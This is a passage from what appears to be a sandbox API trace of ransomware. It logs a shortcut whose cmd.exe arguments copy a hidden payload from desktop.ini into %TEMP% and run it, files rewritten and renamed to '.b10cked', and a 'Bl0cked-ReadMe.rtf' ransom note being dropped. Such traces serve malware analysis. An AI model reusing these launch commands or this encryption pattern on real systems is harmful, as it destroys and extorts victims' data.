\"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x77 | out: lpsz="EXPLORER.EXE \"RIBQ701A98461 Y-C _\" & TYPE \"RIBQ701A98461 Y-C _\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x77 [0233.410] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0233.411] CharUpperBuffW (in: lpsz="explorer.exe \"RIbq701A98461 y-C _\" & type \"RIbq701A98461 y-C _\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x78 | out: lpsz="EXPLORER.EXE \"RIBQ701A98461 Y-C _\" & TYPE \"RIBQ701A98461 Y-C _\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x78 [0233.411] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0233.411] CoInitialize (pvReserved=0x0) returned 0x0 [0233.411] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0233.412] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0233.412] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0233.412] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0233.413] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"RIbq701A98461 y-C _\" & type \"RIbq701A98461 y-C _\\desktop.ini\" > \"%TEMP%\\3D4CoBhf.exe\" && \"%TEMP%\\3D4CoBhf.exe\"") returned 0x0 [0233.413] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0233.413] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0233.413] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0233.413] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _.lnk", fRemember=0) returned 0x0 [0233.471] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0233.471] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0233.471] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0233.471] CoUninitialize () [0233.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.471] ReleaseMutex (hMutex=0xf8) returned 1 [0233.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.471] ReleaseMutex (hMutex=0xf8) returned 1 [0233.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.472] ReleaseMutex (hMutex=0xf8) returned 1 [0233.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.472] ReleaseMutex (hMutex=0xf8) returned 1 [0233.472] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\rd4bMPAMmCyKiYpJrFwO.ots" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\rd4bmpammcykiypjrfwo.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29026117617) returned 1 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1a00 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.472] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a00 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1518 [0233.473] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1a00 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1a00 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.475] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xcff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xcff, lpOverlapped=0x0) returned 1 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.475] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xcff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xcff, lpOverlapped=0x0) returned 1 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd01 [0233.475] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xcff, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xcff, lpOverlapped=0x0) returned 1 [0233.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-3327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd01 [0233.475] WriteFile (in: hFile=0x1b4, lpBuffer=0x127c928*, nNumberOfBytesToWrite=0xcff, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127c928*, lpNumberOfBytesWritten=0x12ec1c*=0xcff, lpOverlapped=0x0) returned 1 [0233.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rd4bMPAMmCyKiYpJrFwO.ots", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0233.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rd4bMPAMmCyKiYpJrFwO.ots", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rd4bMPAMmCyKiYpJrFwO.ots", lpUsedDefaultChar=0x0) returned 24 [0233.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1a00 [0233.479] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.479] CloseHandle (hObject=0x1b4) returned 1 [0233.480] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\rd4bMPAMmCyKiYpJrFwO.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS") returned 0x36 [0233.480] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0233.481] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe4, dwThreadId=0xe8)) returned 1 [0233.484] CloseHandle (hObject=0x120) returned 1 [0233.484] CloseHandle (hObject=0x1b4) returned 1 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\", cchLength=0x6c | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\") returned 0x6c [0233.484] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\RIBQ701A98461 Y-C _\\", cchCount2=108) returned 1 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0233.484] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.484] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.484] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.484] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.484] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.484] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0233.485] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.485] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.485] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xec, dwThreadId=0xba0)) returned 1 [0233.486] CloseHandle (hObject=0x120) returned 1 [0233.486] CloseHandle (hObject=0x1b4) returned 1 [0233.486] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0233.486] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.486] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.486] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.487] ReleaseMutex (hMutex=0xf8) returned 1 [0233.487] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\ieMCxg.pps" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\iemcxg.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29027634187) returned 1 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 